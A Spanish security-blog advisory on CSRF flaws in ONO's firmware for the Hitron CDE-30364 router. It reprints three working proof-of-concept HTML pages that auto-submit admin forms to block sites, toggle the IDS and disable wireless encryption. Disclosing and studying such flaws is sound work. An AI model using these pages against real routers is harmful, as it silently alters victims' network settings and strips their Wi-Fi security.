Múltiples CSRF en firmware de ONO para el router Hitron CDE-30364
Se han descubierto múltiples problemas de seguridad en el firmware proporcionado por ONO para el router Hitron CDE-30364, que permitirían a un atacante remoto realizar ataques cross-Site Request Rorgery (CSRF) y modificar la configuración del dispositivo.
El Hitron CDE-30364 es un cable-modem-router inalámbrico proporcionado
por ONO a sus clientes con conexiones de 30, 50 y 100 megas.
CSRF es una técnica que permite realizar peticiones HTTP a usuarios no
autorizados a través del aprovechamiento de algún error en la validación
de estas peticiones, o incluso la falta de dicha validación. Para
explotar estas vulnerabilidades, el atacante debe engañar a la víctima
que ha iniciado sesión en el dispositivo para que visite una página web
especialmente manipulada desde la que se realizará la petición HTTP no
autorizada y sin conocimiento del usuario legítimo.
Matias Mingorance Svensson ha descubierto múltiples vulnerabilidades
CSRF en la interfaz de administración de los dispositivos Hitron
CDE-30364 que la empresa de telecomunicaciones ONO entrega a sus
clientes. Para documentarlas ha publicado varias pruebas de concepto que
permitirían realizar modificaciones en la configuración del router. Son
las siguientes:
* Activar el bloqueo de sitios web y agregar un filtro (en este ejemplo
la palabra ‘google’):
<html>
<body onload=”javascript:document.forms[0].submit()”>
<H2></H2>
<form method=”POST” name=”form0″ action=”
http://192.168.1.1/goform/Keyword?file=parent-website&dir=admin
%2F&checkboxName=on&blockingFlag=1&blockingAlertFlag=&cfKeyWord_Domain=&cfTrusted_MACAddress=&cfTrusted_MACAddress0=
0&cfTrusted_MACAddress1=0&cfTrusted_MACAddress2=0&cfTrusted_MACAddress3=0&cfTrusted_MACAddress4=0&cfTrusted_MACAddre
ss5=0&trustedMAC=&keyword0=google”>
</body>
</html>
* Activar el sistema de detección de intrusiones (IDS):
<html>
<body onload=”javascript:document.forms[0].submit()”>
<H2></H2>
<form method=”POST” name=”form0″ action=”
http://192.168.1.1/goform/Firewall?dir=admin%2F&file=feat-
firewall&ids_mode=0&IntrusionDMode=on&rspToPing=1″>
</body>
</html>
* Dehabilitar el modo de seguridad Wireless (Wireless Security Mode):
<html>
<body onload=”javascript:document.forms[0].submit()”>
<H2></H2>
<form method=”POST” name=”form0″ action=”
http://192.168.1.1/goform/Wls?dir=admin
%2F&file=wireless_e&key1=0000000000&key2=0000000000&key3=0000000000&key4=0000000000&k128_1=0000000000000000000000000
0&k128_2=00000000000000000000000000&k128_3=00000000000000000000000000&k128_4=00000000000000000000000000&ssid_list=0&
Encrypt_type=0″>
</body>
</html>
Estas vulnerabilidades han sido comprobadas en dispositivos con firmware
3.1.0.8-ONO, aunque otras versiones también podrían verse comprometidas.
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Los comentarios están cerrados.